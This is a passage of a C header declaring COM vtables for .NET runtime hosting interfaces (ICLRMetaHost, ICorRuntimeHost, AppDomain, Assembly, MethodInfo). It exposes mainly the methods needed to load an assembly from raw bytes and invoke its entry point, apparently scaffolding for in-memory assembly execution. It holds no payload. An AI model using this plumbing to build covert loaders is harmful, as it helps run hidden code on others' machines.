43 typedef struct _Type IType;
44 typedef struct _Binder IBinder;
45 typedef struct _MethodInfo IMethodInfo;
46
47 typedef void *HDOMAINENUM;
48
49 typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )(
50 REFCLSID clsid,
51 REFIID riid,
52 LPVOID *ppInterface);
53
54 typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )(
55 REFCLSID clsid,
56 REFIID riid,
57 LPVOID *ppInterface);
58
59
60 typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void);
61
62 typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void);
63
64 typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )(
65 ICLRRuntimeInfo *pRuntimeInfo,
66 CallbackThreadSetFnPtr pfnCallbackThreadSet,
67 CallbackThreadUnsetFnPtr pfnCallbackThreadUnset);
68
69 #undef DUMMY_METHOD
70 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
71
72 typedef struct _BinderVtbl {
73 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
74 IBinder * This,
75 /* [in] */ REFIID riid,
76 /* [iid_is][out] */ void **ppvObject);
77
78 ULONG ( STDMETHODCALLTYPE *AddRef )(
79 IBinder * This);
80
81 ULONG ( STDMETHODCALLTYPE *Release )(
82 IBinder * This);
83
84 DUMMY_METHOD(GetTypeInfoCount);
85 DUMMY_METHOD(GetTypeInfo);
86 DUMMY_METHOD(GetIDsOfNames);
87 DUMMY_METHOD(Invoke);
88 DUMMY_METHOD(ToString);
89 DUMMY_METHOD(Equals);
90 DUMMY_METHOD(GetHashCode);
91 DUMMY_METHOD(GetType);
92 DUMMY_METHOD(BindToMethod);
93 DUMMY_METHOD(BindToField);
94 DUMMY_METHOD(SelectMethod);
95 DUMMY_METHOD(SelectProperty);
96 DUMMY_METHOD(ChangeType);
97 DUMMY_METHOD(ReorderArgumentArray);
98 } BinderVtbl;
99
100 typedef struct _Binder {
101 BinderVtbl *lpVtbl;
102 } Binder;
103
104 #undef DUMMY_METHOD
105 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This)
106
107 typedef struct _AppDomainVtbl {
108 BEGIN_INTERFACE
109
110 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
111 IAppDomain * This,
112 /* [in] */ REFIID riid,
113 /* [iid_is][out] */ void **ppvObject);
114
115 ULONG ( STDMETHODCALLTYPE *AddRef )(
116 IAppDomain * This);
117
118 ULONG ( STDMETHODCALLTYPE *Release )(
119 IAppDomain * This);
120
121 DUMMY_METHOD(GetTypeInfoCount);
122 DUMMY_METHOD(GetTypeInfo);
123 DUMMY_METHOD(GetIDsOfNames);
124 DUMMY_METHOD(Invoke);
125
126 DUMMY_METHOD(ToString);
127 DUMMY_METHOD(Equals);
128 DUMMY_METHOD(GetHashCode);
129 DUMMY_METHOD(GetType);
130 DUMMY_METHOD(InitializeLifetimeService);
131 DUMMY_METHOD(GetLifetimeService);
132 DUMMY_METHOD(Evidence);
133 DUMMY_METHOD(add_DomainUnload);
134 DUMMY_METHOD(remove_DomainUnload);
135 DUMMY_METHOD(add_AssemblyLoad);
136 DUMMY_METHOD(remove_AssemblyLoad);
137 DUMMY_METHOD(add_ProcessExit);
138 DUMMY_METHOD(remove_ProcessExit);
139 DUMMY_METHOD(add_TypeResolve);
140 DUMMY_METHOD(remove_TypeResolve);
141 DUMMY_METHOD(add_ResourceResolve);
142 DUMMY_METHOD(remove_ResourceResolve);
143 DUMMY_METHOD(add_AssemblyResolve);
144 DUMMY_METHOD(remove_AssemblyResolve);
145 DUMMY_METHOD(add_UnhandledException);
146 DUMMY_METHOD(remove_UnhandledException);
147 DUMMY_METHOD(DefineDynamicAssembly);
148 DUMMY_METHOD(DefineDynamicAssembly_2);
149 DUMMY_METHOD(DefineDynamicAssembly_3);
150 DUMMY_METHOD(DefineDynamicAssembly_4);
151 DUMMY_METHOD(DefineDynamicAssembly_5);
152 DUMMY_METHOD(DefineDynamicAssembly_6);
153 DUMMY_METHOD(DefineDynamicAssembly_7);
154 DUMMY_METHOD(DefineDynamicAssembly_8);
155 DUMMY_METHOD(DefineDynamicAssembly_9);
156 DUMMY_METHOD(CreateInstance);
157 DUMMY_METHOD(CreateInstanceFrom);
158 DUMMY_METHOD(CreateInstance_2);
159 DUMMY_METHOD(CreateInstanceFrom_2);
160 DUMMY_METHOD(CreateInstance_3);
161 DUMMY_METHOD(CreateInstanceFrom_3);
162 DUMMY_METHOD(Load);
163 DUMMY_METHOD(Load_2);
164
165 HRESULT (STDMETHODCALLTYPE *Load_3)(
166 IAppDomain *This,
167 SAFEARRAY *rawAssembly,
168 IAssembly **pRetVal);
169
170 DUMMY_METHOD(Load_4);
171 DUMMY_METHOD(Load_5);
172 DUMMY_METHOD(Load_6);
173 DUMMY_METHOD(Load_7);
174 DUMMY_METHOD(ExecuteAssembly);
175 DUMMY_METHOD(ExecuteAssembly_2);
176 DUMMY_METHOD(ExecuteAssembly_3);
177 DUMMY_METHOD(FriendlyName);
178 DUMMY_METHOD(BaseDirectory);
179 DUMMY_METHOD(RelativeSearchPath);
180 DUMMY_METHOD(ShadowCopyFiles);
181 DUMMY_METHOD(GetAssemblies);
182 DUMMY_METHOD(AppendPrivatePath);
183 DUMMY_METHOD(ClearPrivatePath);
184 DUMMY_METHOD(SetShadowCopyPath);
185 DUMMY_METHOD(ClearShadowCopyPath);
186 DUMMY_METHOD(SetCachePath);
187 DUMMY_METHOD(SetData);
188 DUMMY_METHOD(GetData);
189 DUMMY_METHOD(SetAppDomainPolicy);
190 DUMMY_METHOD(SetThreadPrincipal);
191 DUMMY_METHOD(SetPrincipalPolicy);
192 DUMMY_METHOD(DoCallBack);
193 DUMMY_METHOD(DynamicDirectory);
194
195 END_INTERFACE
196 } AppDomainVtbl;
197
198 typedef struct _AppDomain {
199 AppDomainVtbl *lpVtbl;
200 } AppDomain;
201
202 #undef DUMMY_METHOD
203 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This)
204
205 typedef struct _AssemblyVtbl {
206 BEGIN_INTERFACE
207
208 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
209 IAssembly * This,
210 REFIID riid,
211 void **ppvObject);
212
213 ULONG ( STDMETHODCALLTYPE *AddRef )(
214 IAssembly * This);
215
216 ULONG ( STDMETHODCALLTYPE *Release )(
217 IAssembly * This);
218
219 DUMMY_METHOD(GetTypeInfoCount);
220 DUMMY_METHOD(GetTypeInfo);
221 DUMMY_METHOD(GetIDsOfNames);
222
223 DUMMY_METHOD(Invoke);
224 DUMMY_METHOD(ToString);
225 DUMMY_METHOD(Equals);
226 DUMMY_METHOD(GetHashCode);
227 DUMMY_METHOD(GetType);
228 DUMMY_METHOD(CodeBase);
229 DUMMY_METHOD(EscapedCodeBase);
230 DUMMY_METHOD(GetName);
231 DUMMY_METHOD(GetName_2);
232 DUMMY_METHOD(FullName);
233
234 HRESULT (STDMETHODCALLTYPE *EntryPoint)(
235 IAssembly *This,
236 IMethodInfo **pRetVal);
237
238 HRESULT (STDMETHODCALLTYPE *GetType_2)(
239 IAssembly *This,
240 BSTR name,
241 IType **pRetVal);
242
243 DUMMY_METHOD(GetType_3);
244 DUMMY_METHOD(GetExportedTypes);
245 DUMMY_METHOD(GetTypes);
246 DUMMY_METHOD(GetManifestResourceStream);
247 DUMMY_METHOD(GetManifestResourceStream_2);
248 DUMMY_METHOD(GetFile);
249 DUMMY_METHOD(GetFiles);
250 DUMMY_METHOD(GetFiles_2);
251 DUMMY_METHOD(GetManifestResourceNames);
252 DUMMY_METHOD(GetManifestResourceInfo);
253 DUMMY_METHOD(Location);
254 DUMMY_METHOD(Evidence);
255 DUMMY_METHOD(GetCustomAttributes);
256 DUMMY_METHOD(GetCustomAttributes_2);
257 DUMMY_METHOD(IsDefined);
258 DUMMY_METHOD(GetObjectData);
259 DUMMY_METHOD(add_ModuleResolve);
260 DUMMY_METHOD(remove_ModuleResolve);
261 DUMMY_METHOD(GetType_4);
262 DUMMY_METHOD(GetSatelliteAssembly);
263 DUMMY_METHOD(GetSatelliteAssembly_2);
264 DUMMY_METHOD(LoadModule);
265 DUMMY_METHOD(LoadModule_2);
266 DUMMY_METHOD(CreateInstance);
267 DUMMY_METHOD(CreateInstance_2);
268 DUMMY_METHOD(CreateInstance_3);
269 DUMMY_METHOD(GetLoadedModules);
270 DUMMY_METHOD(GetLoadedModules_2);
271 DUMMY_METHOD(GetModules);
272 DUMMY_METHOD(GetModules_2);
273 DUMMY_METHOD(GetModule);
274 DUMMY_METHOD(GetReferencedAssemblies);
275 DUMMY_METHOD(GlobalAssemblyCache);
276
277 END_INTERFACE
278 } AssemblyVtbl;
279
280 typedef enum _BindingFlags {
281 BindingFlags_Default = 0,
282 BindingFlags_IgnoreCase = 1,
283 BindingFlags_DeclaredOnly = 2,
284 BindingFlags_Instance = 4,
285 BindingFlags_Static = 8,
286 BindingFlags_Public = 16,
287 BindingFlags_NonPublic = 32,
288 BindingFlags_FlattenHierarchy = 64,
289 BindingFlags_InvokeMethod = 256,
290 BindingFlags_CreateInstance = 512,
291 BindingFlags_GetField = 1024,
292 BindingFlags_SetField = 2048,
293 BindingFlags_GetProperty = 4096,
294 BindingFlags_SetProperty = 8192,
295 BindingFlags_PutDispProperty = 16384,
296 BindingFlags_PutRefDispProperty = 32768,
297 BindingFlags_ExactBinding = 65536,
298 BindingFlags_SuppressChangeType = 131072,
299 BindingFlags_OptionalParamBinding = 262144,
300 BindingFlags_IgnoreReturn = 16777216
301 } BindingFlags;
302
303 typedef struct _Assembly {
304 AssemblyVtbl *lpVtbl;
305 } Assembly;
306
307 #undef DUMMY_METHOD
308 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This)
309
310 typedef struct _TypeVtbl {
311 BEGIN_INTERFACE
312
313 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
314 IType * This,
315 REFIID riid,
316 void **ppvObject);
317
318 ULONG ( STDMETHODCALLTYPE *AddRef )(
319 IType * This);
320
321 ULONG ( STDMETHODCALLTYPE *Release )(
322 IType * This);
323
324 DUMMY_METHOD(GetTypeInfoCount);
325 DUMMY_METHOD(GetTypeInfo);
326 DUMMY_METHOD(GetIDsOfNames);
327 DUMMY_METHOD(Invoke);
328
329 DUMMY_METHOD(ToString);
330 DUMMY_METHOD(Equals);
331 DUMMY_METHOD(GetHashCode);
332 DUMMY_METHOD(GetType);
333 DUMMY_METHOD(MemberType);
334 DUMMY_METHOD(name);
335 DUMMY_METHOD(DeclaringType);
336 DUMMY_METHOD(ReflectedType);
337 DUMMY_METHOD(GetCustomAttributes);
338 DUMMY_METHOD(GetCustomAttributes_2);
339 DUMMY_METHOD(IsDefined);
340 DUMMY_METHOD(Guid);
341 DUMMY_METHOD(Module);
342 DUMMY_METHOD(Assembly);
343 DUMMY_METHOD(TypeHandle);
344 DUMMY_METHOD(FullName);
345 DUMMY_METHOD(Namespace);
346 DUMMY_METHOD(AssemblyQualifiedName);
347 DUMMY_METHOD(GetArrayRank);
348 DUMMY_METHOD(BaseType);
349 DUMMY_METHOD(GetConstructors);
350 DUMMY_METHOD(GetInterface);
351 DUMMY_METHOD(GetInterfaces);
352 DUMMY_METHOD(FindInterfaces);
353 DUMMY_METHOD(GetEvent);
354 DUMMY_METHOD(GetEvents);
355 DUMMY_METHOD(GetEvents_2);
356 DUMMY_METHOD(GetNestedTypes);
357 DUMMY_METHOD(GetNestedType);
358 DUMMY_METHOD(GetMember);
359 DUMMY_METHOD(GetDefaultMembers);
360 DUMMY_METHOD(FindMembers);
361 DUMMY_METHOD(GetElementType);
362 DUMMY_METHOD(IsSubclassOf);
363 DUMMY_METHOD(IsInstanceOfType);
364 DUMMY_METHOD(IsAssignableFrom);
365 DUMMY_METHOD(GetInterfaceMap);
366 DUMMY_METHOD(GetMethod);
367 DUMMY_METHOD(GetMethod_2);
368 DUMMY_METHOD(GetMethods);
369 DUMMY_METHOD(GetField);
370 DUMMY_METHOD(GetFields);
371 DUMMY_METHOD(GetProperty);
372 DUMMY_METHOD(GetProperty_2);
373 DUMMY_METHOD(GetProperties);
374 DUMMY_METHOD(GetMember_2);
375 DUMMY_METHOD(GetMembers);
376 DUMMY_METHOD(InvokeMember);
377 DUMMY_METHOD(UnderlyingSystemType);
378 DUMMY_METHOD(InvokeMember_2);
379
380 HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
381 IType *This,
382 BSTR name,
383 BindingFlags invokeAttr,
384 IBinder *Binder,
385 VARIANT Target,
386 SAFEARRAY *args,
387 VARIANT *pRetVal);
388
389 DUMMY_METHOD(GetConstructor);
390 DUMMY_METHOD(GetConstructor_2);
391 DUMMY_METHOD(GetConstructor_3);
392 DUMMY_METHOD(GetConstructors_2);
393 DUMMY_METHOD(TypeInitializer);
394 DUMMY_METHOD(GetMethod_3);
395 DUMMY_METHOD(GetMethod_4);
396 DUMMY_METHOD(GetMethod_5);
397 DUMMY_METHOD(GetMethod_6);
398 DUMMY_METHOD(GetMethods_2);
399 DUMMY_METHOD(GetField_2);
400 DUMMY_METHOD(GetFields_2);
401 DUMMY_METHOD(GetInterface_2);
402 DUMMY_METHOD(GetEvent_2);
403 DUMMY_METHOD(GetProperty_3);
404 DUMMY_METHOD(GetProperty_4);
405 DUMMY_METHOD(GetProperty_5);
406 DUMMY_METHOD(GetProperty_6);
407 DUMMY_METHOD(GetProperty_7);
408 DUMMY_METHOD(GetProperties_2);
409 DUMMY_METHOD(GetNestedTypes_2);
410 DUMMY_METHOD(GetNestedType_2);
411 DUMMY_METHOD(GetMember_3);
412 DUMMY_METHOD(GetMembers_2);
413 DUMMY_METHOD(Attributes);
414 DUMMY_METHOD(IsNotPublic);
415 DUMMY_METHOD(IsPublic);
416 DUMMY_METHOD(IsNestedPublic);
417 DUMMY_METHOD(IsNestedPrivate);
418 DUMMY_METHOD(IsNestedFamily);
419 DUMMY_METHOD(IsNestedAssembly);
420 DUMMY_METHOD(IsNestedFamANDAssem);
421 DUMMY_METHOD(IsNestedFamORAssem);
422 DUMMY_METHOD(IsAutoLayout);
423 DUMMY_METHOD(IsLayoutSequential);
424 DUMMY_METHOD(IsExplicitLayout);
425 DUMMY_METHOD(IsClass);
426 DUMMY_METHOD(IsInterface);
427 DUMMY_METHOD(IsValueType);
428 DUMMY_METHOD(IsAbstract);
429 DUMMY_METHOD(IsSealed);
430 DUMMY_METHOD(IsEnum);
431 DUMMY_METHOD(IsSpecialName);
432 DUMMY_METHOD(IsImport);
433 DUMMY_METHOD(IsSerializable);
434 DUMMY_METHOD(IsAnsiClass);
435 DUMMY_METHOD(IsUnicodeClass);
436 DUMMY_METHOD(IsAutoClass);
437 DUMMY_METHOD(IsArray);
438 DUMMY_METHOD(IsByRef);
439 DUMMY_METHOD(IsPointer);
440 DUMMY_METHOD(IsPrimitive);
441 DUMMY_METHOD(IsCOMObject);
442 DUMMY_METHOD(HasElementType);
443 DUMMY_METHOD(IsContextful);
444 DUMMY_METHOD(IsMarshalByRef);
445 DUMMY_METHOD(Equals_2);
446
447 END_INTERFACE
448 } TypeVtbl;
449
450 typedef struct ICLRRuntimeInfoVtbl
451 {
452 BEGIN_INTERFACE
453
454 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
455 ICLRRuntimeInfo * This,
456 /* [in] */ REFIID riid,
457 /* [iid_is][out] */
458 __RPC__deref_out void **ppvObject);
459
460 ULONG ( STDMETHODCALLTYPE *AddRef )(
461 ICLRRuntimeInfo * This);
462
463 ULONG ( STDMETHODCALLTYPE *Release )(
464 ICLRRuntimeInfo * This);
465
466 HRESULT ( STDMETHODCALLTYPE *GetVersionString )(
467 ICLRRuntimeInfo * This,
468 /* [size_is][out] */
469 __out_ecount_full_opt(*pcchBuffer) LPWSTR pwzBuffer,
470 /* [out][in] */ DWORD *pcchBuffer);
471
472 HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )(
473 ICLRRuntimeInfo * This,
474 /* [size_is][out] */
475 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
476 /* [out][in] */ DWORD *pcchBuffer);
477
478 HRESULT ( STDMETHODCALLTYPE *IsLoaded )(
479 ICLRRuntimeInfo * This,
480 /* [in] */ HANDLE hndProcess,
481 /* [retval][out] */ BOOL *pbLoaded);
482
483 HRESULT ( STDMETHODCALLTYPE *LoadErrorString )(
484 ICLRRuntimeInfo * This,
485 /* [in] */ UINT iResourceID,
486 /* [size_is][out] */
487 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
488 /* [out][in] */ DWORD *pcchBuffer,
489 /* [lcid][in] */ LONG iLocaleID);
490
491 HRESULT ( STDMETHODCALLTYPE *LoadLibrary )(
492 ICLRRuntimeInfo * This,
493 /* [in] */ LPCWSTR pwzDllName,
494 /* [retval][out] */ HMODULE *phndModule);
495
496 HRESULT ( STDMETHODCALLTYPE *GetProcAddress )(
497 ICLRRuntimeInfo * This,
498 /* [in] */ LPCSTR pszProcName,
499 /* [retval][out] */ LPVOID *ppProc);
500
501 HRESULT ( STDMETHODCALLTYPE *GetInterface )(
502 ICLRRuntimeInfo * This,
503 /* [in] */ REFCLSID rclsid,
504 /* [in] */ REFIID riid,
505 /* [retval][iid_is][out] */ LPVOID *ppUnk);
506
507 HRESULT ( STDMETHODCALLTYPE *IsLoadable )(
508 ICLRRuntimeInfo * This,
509 /* [retval][out] */ BOOL *pbLoadable);
510
511 HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )(
512 ICLRRuntimeInfo * This,
513 /* [in] */ DWORD dwStartupFlags,
514 /* [in] */ LPCWSTR pwzHostConfigFile);
515
516 HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )(
517 ICLRRuntimeInfo * This,
518 /* [out] */ DWORD *pdwStartupFlags,
519 /* [size_is][out] */
520 __out_ecount_full_opt(*pcchHostConfigFile) LPWSTR pwzHostConfigFile,
521 /* [out][in] */ DWORD *pcchHostConfigFile);
522
523 HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )(
524 ICLRRuntimeInfo * This);
525
526 HRESULT ( STDMETHODCALLTYPE *IsStarted )(
527 ICLRRuntimeInfo * This,
528 /* [out] */ BOOL *pbStarted,
529 /* [out] */ DWORD *pdwStartupFlags);
530
531 END_INTERFACE
532 } ICLRRuntimeInfoVtbl;
533
534 typedef struct _ICLRRuntimeInfo {
535 ICLRRuntimeInfoVtbl *lpVtbl;
536 } ICLRRuntimeInfo;
537
538 typedef struct _Type {
539 TypeVtbl *lpVtbl;
540 } Type;
541
542 typedef struct ICLRMetaHostVtbl
543 {
544 BEGIN_INTERFACE
545
546 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
547 ICLRMetaHost * This,
548 /* [in] */ REFIID riid,
549 /* [iid_is][out] */
550 __RPC__deref_out void **ppvObject);
551
552 ULONG ( STDMETHODCALLTYPE *AddRef )(
553 ICLRMetaHost * This);
554
555 ULONG ( STDMETHODCALLTYPE *Release )(
556 ICLRMetaHost * This);
557
558 HRESULT ( STDMETHODCALLTYPE *GetRuntime )(
559 ICLRMetaHost * This,
560 /* [in] */ LPCWSTR pwzVersion,
561 /* [in] */ REFIID riid,
562 /* [retval][iid_is][out] */ LPVOID *ppRuntime);
563
564 HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )(
565 ICLRMetaHost * This,
566 /* [in] */ LPCWSTR pwzFilePath,
567 /* [size_is][out] */
568 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
569 /* [out][in] */ DWORD *pcchBuffer);
570
571 HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )(
572 ICLRMetaHost * This,
573 /* [retval][out] */ IEnumUnknown **ppEnumerator);
574
575 HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )(
576 ICLRMetaHost * This,
577 /* [in] */ HANDLE hndProcess,
578 /* [retval][out] */ IEnumUnknown **ppEnumerator);
579
580 HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )(
581 ICLRMetaHost * This,
582 /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction);
583
584 HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )(
585 ICLRMetaHost * This,
586 /* [in] */ REFIID riid,
587 /* [retval][iid_is][out] */ LPVOID *ppUnk);
588
589 HRESULT ( STDMETHODCALLTYPE *ExitProcess )(
590 ICLRMetaHost * This,
591 /* [in] */ INT32 iExitCode);
592
593 END_INTERFACE
594 } ICLRMetaHostVtbl;
595
596 typedef struct _ICLRMetaHost
597 {
598 ICLRMetaHostVtbl *lpVtbl;
599 } ICLRMetaHost;
600
601 typedef struct ICorRuntimeHostVtbl
602 {
603 BEGIN_INTERFACE
604
605 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
606 ICorRuntimeHost * This,
607 /* [in] */ REFIID riid,
608 /* [iid_is][out] */
609 __RPC__deref_out void **ppvObject);
610
611 ULONG ( STDMETHODCALLTYPE *AddRef )(
612 ICorRuntimeHost * This);
613
614 ULONG ( STDMETHODCALLTYPE *Release )(
615 ICorRuntimeHost * This);
616
617 HRESULT ( STDMETHODCALLTYPE *CreateLogicalThreadState )(
618 ICorRuntimeHost * This);
619
620 HRESULT ( STDMETHODCALLTYPE *DeleteLogicalThreadState )(
621 ICorRuntimeHost * This);
622
623 HRESULT ( STDMETHODCALLTYPE *SwitchInLogicalThreadState )(
624 ICorRuntimeHost * This,
625 /* [in] */ DWORD *pFiberCookie);
626
627 HRESULT ( STDMETHODCALLTYPE *SwitchOutLogicalThreadState )(
628 ICorRuntimeHost * This,
629 /* [out] */ DWORD **pFiberCookie);
630
631 HRESULT ( STDMETHODCALLTYPE *LocksHeldByLogicalThread )(
632 ICorRuntimeHost * This,
633 /* [out] */ DWORD *pCount);
634
635 HRESULT ( STDMETHODCALLTYPE *MapFile )(
636 ICorRuntimeHost * This,
637 /* [in] */ HANDLE hFile,
638 /* [out] */ HMODULE *hMapAddress);
639
640 HRESULT ( STDMETHODCALLTYPE *GetConfiguration )(
641 ICorRuntimeHost * This,
642 /* [out] */ ICorConfiguration **pConfiguration);
643
644 HRESULT ( STDMETHODCALLTYPE *Start )(
645 ICorRuntimeHost * This);
646
647 HRESULT ( STDMETHODCALLTYPE *Stop )(
648 ICorRuntimeHost * This);
649
650 HRESULT ( STDMETHODCALLTYPE *CreateDomain )(
651 ICorRuntimeHost * This,
652 /* [in] */ LPCWSTR pwzFriendlyName,
653 /* [in] */ IUnknown *pIdentityArray,
654 /* [out] */ IUnknown **pAppDomain);
655
656 HRESULT ( STDMETHODCALLTYPE *GetDefaultDomain )(
657 ICorRuntimeHost * This,
658 /* [out] */ IUnknown **pAppDomain);
659
660 HRESULT ( STDMETHODCALLTYPE *EnumDomains )(
661 ICorRuntimeHost * This,
662 /* [out] */ HDOMAINENUM *hEnum);
663
664 HRESULT ( STDMETHODCALLTYPE *NextDomain )(
665 ICorRuntimeHost * This,
666 /* [in] */ HDOMAINENUM hEnum,
667 /* [out] */ IUnknown **pAppDomain);
668
669 HRESULT ( STDMETHODCALLTYPE *CloseEnum )(
670 ICorRuntimeHost * This,
671 /* [in] */ HDOMAINENUM hEnum);
672
673 HRESULT ( STDMETHODCALLTYPE *CreateDomainEx )(
674 ICorRuntimeHost * This,
675 /* [in] */ LPCWSTR pwzFriendlyName,
676 /* [in] */ IUnknown *pSetup,
677 /* [in] */ IUnknown *pEvidence,
678 /* [out] */ IUnknown **pAppDomain);
679
680 HRESULT ( STDMETHODCALLTYPE *CreateDomainSetup )(
681 ICorRuntimeHost * This,
682 /* [out] */ IUnknown **pAppDomainSetup);
683
684 HRESULT ( STDMETHODCALLTYPE *CreateEvidence )(
685 ICorRuntimeHost * This,
686 /* [out] */ IUnknown **pEvidence);
687
688 HRESULT ( STDMETHODCALLTYPE *UnloadDomain )(
689 ICorRuntimeHost * This,
690 /* [in] */ IUnknown *pAppDomain);
691
692 HRESULT ( STDMETHODCALLTYPE *CurrentDomain )(
693 ICorRuntimeHost * This,
694 /* [out] */ IUnknown **pAppDomain);
695
696 END_INTERFACE
697 } ICorRuntimeHostVtbl;
698
699 typedef struct _ICorRuntimeHost {
700 ICorRuntimeHostVtbl *lpVtbl;
701 } ICorRuntimeHost;
702
703 #undef DUMMY_METHOD
704 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This)
705
706 typedef struct _MethodInfoVtbl {
707 BEGIN_INTERFACE
708
709 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
710 IMethodInfo *This,
711 /* [in] */ REFIID riid,
712 /* [iid_is][out] */
713 __RPC__deref_out void **ppvObject);
714
715 ULONG ( STDMETHODCALLTYPE *AddRef )(
716 IMethodInfo *This);
717
718 ULONG ( STDMETHODCALLTYPE *Release )(
719 IMethodInfo *This);
720
721 DUMMY_METHOD(GetTypeInfoCount);
722 DUMMY_METHOD(GetTypeInfo);
723 DUMMY_METHOD(GetIDsOfNames);
724 DUMMY_METHOD(Invoke);
725
726 DUMMY_METHOD(ToString);
727 DUMMY_METHOD(Equals);
728 DUMMY_METHOD(GetHashCode);
729 DUMMY_METHOD(GetType);
730 DUMMY_METHOD(MemberType);
731 DUMMY_METHOD(name);
732 DUMMY_METHOD(DeclaringType);
733 DUMMY_METHOD(ReflectedType);
734 DUMMY_METHOD(GetCustomAttributes);
735 DUMMY_METHOD(GetCustomAttributes_2);
736 DUMMY_METHOD(IsDefined);
737
738 HRESULT ( STDMETHODCALLTYPE *GetParameters)(
739 IMethodInfo *This,
740 SAFEARRAY **pRetVal);
741
742 DUMMY_METHOD(GetMethodImplementationFlags);
743 DUMMY_METHOD(MethodHandle);
744 DUMMY_METHOD(Attributes);
745 DUMMY_METHOD(CallingConvention);
746 DUMMY_METHOD(Invoke_2);
747 DUMMY_METHOD(IsPublic);
748 DUMMY_METHOD(IsPrivate);
749 DUMMY_METHOD(IsFamily);
750 DUMMY_METHOD(IsAssembly);
751 DUMMY_METHOD(IsFamilyAndAssembly);
752 DUMMY_METHOD(IsFamilyOrAssembly);
753 DUMMY_METHOD(IsStatic);
754 DUMMY_METHOD(IsFinal);
755 DUMMY_METHOD(IsVirtual);
756 DUMMY_METHOD(IsHideBySig);
757 DUMMY_METHOD(IsAbstract);
758 DUMMY_METHOD(IsSpecialName);
759 DUMMY_METHOD(IsConstructor);
760
761 HRESULT ( STDMETHODCALLTYPE *Invoke_3 )(
762 IMethodInfo *This,
763 VARIANT obj,
764 SAFEARRAY *parameters,
765 VARIANT *ret);
766
767 DUMMY_METHOD(returnType);
768 DUMMY_METHOD(ReturnTypeCustomAttributes);
769 DUMMY_METHOD(GetBaseDefinition);
770
771 END_INTERFACE
772 } MethodInfoVtbl;
773
774 typedef struct _MethodInfo {
775 MethodInfoVtbl *lpVtbl;
776 } MethodInfo;
777
778 typedef struct ICorConfigurationVtbl
779 {
780 BEGIN_INTERFACE
781
782 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
783 ICorConfiguration * This,
784 /* [in] */ REFIID riid,
785 /* [iid_is][out] */
786 __RPC__deref_out void **ppvObject);
787
788 ULONG ( STDMETHODCALLTYPE *AddRef )(
789 ICorConfiguration * This);
790
791 ULONG ( STDMETHODCALLTYPE *Release )(
792 ICorConfiguration * This);
793
794 HRESULT ( STDMETHODCALLTYPE *SetGCThreadControl )(
795 ICorConfiguration * This,
796 /* [in] */ IGCThreadControl *pGCThreadControl);
797
798 HRESULT ( STDMETHODCALLTYPE *SetGCHostControl )(
799 ICorConfiguration * This,
800 /* [in] */ IGCHostControl *pGCHostControl);
801
802 HRESULT ( STDMETHODCALLTYPE *SetDebuggerThreadControl )(
803 ICorConfiguration * This,
804 /* [in] */ IDebuggerThreadControl *pDebuggerThreadControl);
805
806 HRESULT ( STDMETHODCALLTYPE *AddDebuggerSpecialThread )(
807 ICorConfiguration * This,
808 /* [in] */ DWORD dwSpecialThreadId);
809
810 END_INTERFACE
811 } ICorConfigurationVtbl;
812
813 typedef struct _ICorConfiguration
814 {
815 ICorConfigurationVtbl *lpVtbl;
816 }ICorConfiguration;
817
818 typedef struct IGCThreadControlVtbl
819 {
820 BEGIN_INTERFACE
821
822 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
823 IGCThreadControl * This,
824 /* [in] */ REFIID riid,
825 /* [iid_is][out] */
826 __RPC__deref_out void **ppvObject);
827
828 ULONG ( STDMETHODCALLTYPE *AddRef )(
829 IGCThreadControl * This);
830
831 ULONG ( STDMETHODCALLTYPE *Release )(
832 IGCThreadControl * This);
833
834 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForSuspension )(
835 IGCThreadControl * This);
836
837 HRESULT ( STDMETHODCALLTYPE *SuspensionStarting )(
838 IGCThreadControl * This);
839
840 HRESULT ( STDMETHODCALLTYPE *SuspensionEnding )(
841 IGCThreadControl * This,
842 DWORD Generation);
843
844 END_INTERFACE
845 } IGCThreadControlVtbl;
846
847 typedef struct _IGCThreadControl
848 {
849 IGCThreadControlVtbl *lpVtbl;
850 }IGCThreadControl;
851
852 typedef struct IGCHostControlVtbl
853 {
854 BEGIN_INTERFACE
855
856 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
857 IGCHostControl * This,
858 /* [in] */ REFIID riid,
859 /* [iid_is][out] */
860 __RPC__deref_out void **ppvObject);
861
862 ULONG ( STDMETHODCALLTYPE *AddRef )(
863 IGCHostControl * This);
864
865 ULONG ( STDMETHODCALLTYPE *Release )(
866 IGCHostControl * This);
867
